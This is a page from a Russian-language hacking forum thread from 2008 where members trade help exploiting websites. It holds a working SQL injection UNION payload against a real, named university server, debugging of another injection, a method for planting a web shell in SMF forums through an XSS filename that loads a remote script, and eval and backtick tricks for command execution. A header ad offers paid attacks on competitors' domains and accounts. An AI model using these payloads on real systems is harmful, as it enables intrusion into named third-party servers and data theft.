Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 320 из 2422

320

Опции темы

Поиск в этой теме

Опции просмотра

05.09.2008, 23:11

DimOnOID

Постоянный

Регистрация: 05.12.2006

Сообщений: 477

С нами: 10226672

Репутация: 441

Цитата:

Сообщение от .Striker

помогите расскрутить скулю, я не шарю
домен пр5
http://web.ffos.hr/serv_file.php?file=-44'

http://web.ffos.hr/serv_file.php?file=-44+union+select+1,2,concat_ws(0x40,version(),user( ),database()),4,5,6,7,8/*
вывод 3и4....4-название файла..3 внутри файла...

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось DimOnOID; 05.09.2008 в 23:14..

06.09.2008, 09:48

USAkid

Участник форума

Регистрация: 17.06.2008

Сообщений: 214

С нами: 9420866

Репутация: 228

Ну вот. Приехал

... Не пойму в чем ошибка:
Составляю: http://site.ru/?cat=103&id=1/**/order/**/by/**/100/*
Вылазит:

Код:

MySQL Error...
SQL Query: select * from fotocatalog where m_id = '0' and status != 'del' and p_id = '1/**/order/**/by/**/100/*' order by date desc limit -2575, 25
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-2575, 25' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/***/***/***.ru/test.php on line 84

Перепробовал уже и /**/ и + и %20 , все одно и тоже вылазит. Также пробовал and и другие - в результате 0...

*призадумался

06.09.2008, 10:03

MaSTeR GэN

Участник форума

Регистрация: 23.05.2008

Сообщений: 121

С нами: 9457097

Репутация: 133

2usakid параметр предыдуший ковычкой закрой у тебя запрос просто кривоватый получаеться !

Последний раз редактировалось MaSTeR GэN; 06.09.2008 в 10:07..

06.09.2008, 13:20

Doom123

Постоянный

Регистрация: 11.11.2006

Сообщений: 834

С нами: 10262314

Репутация: 668

USAkid

http://site.ru/?cat=103&id=1'/**/order/**/by/**/100/*

06.09.2008, 14:14

geforse

Постоянный

Регистрация: 02.03.2008

Сообщений: 893

С нами: 9574565

Репутация: 712

В теме Уязвимости SMF (во втором сообщении)
XSS
Отсутствует фильтрация atachment filename
-------------------------
Получение web shell'a
нужно создать сообщение и прикрепить файл с именем "name<img src=...."

и загружается .js скрипт

Цитата:

Это код простейшего динамического загрузчика скриптов http:&#47&#47site.com&#47smfexp.js - адрес загружаемого скрипта smfexp.js изменяет шаблон default темы: вставляет в /smf/Themes/default/index.php shell

-------
Этот скрипт изменять надо или шел появится сразу как я напишу сообщение ?

06.09.2008, 19:51

Fuckel

Участник форума

Регистрация: 17.01.2008

Сообщений: 170

С нами: 9640431

Репутация: 105

есть такая конструкция в скрипте

PHP код:


		
			
eval(stripslashes($_GET['var']));

проблема: при запросе фильтруется использование сразу двух скобок, " и \
каким метод получиться залить шелл, если вообще получится?

07.09.2008, 02:07

o3,14um

Участник форума

Регистрация: 16.11.2006

Сообщений: 230

С нами: 10254549

Репутация: 227

стрипслэш не фильтрует ковычки `
а если сделать такой запрос:

echo с такими ковычками, то получится тоже самое что и system()

пример:

Цитата:

echo `ls -la`;

ещё пример:

Цитата:

<?php
$s = "echo `dir`;";
eval(stripslashes($s));

?>

===

2geforse
шелл загрузится если админ попадёт на страницу с правильно сформатированным запросом, если я прально понял о чём ты

Последний раз редактировалось o3,14um; 07.09.2008 в 02:10..

07.09.2008, 12:16

geforse

Постоянный

Регистрация: 02.03.2008

Сообщений: 893

С нами: 9574565

Репутация: 712

o3,14um
ясно, спасибо
буду тестить на локалхосте = )

07.09.2008, 14:32

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

С нами: 10309346

Репутация: 4303

echo с такими ковычками, то получится тоже самое что и system()

вернее это то же самое что shell_exec()

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#10

07.09.2008, 19:15

.Striker

Участник форума

Регистрация: 11.11.2007

Сообщений: 260

С нами: 9736147

Репутация: 155

как узнать сайт хостится на виндовом или линуксовом сервере?

Страница 320 из 2422

320

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules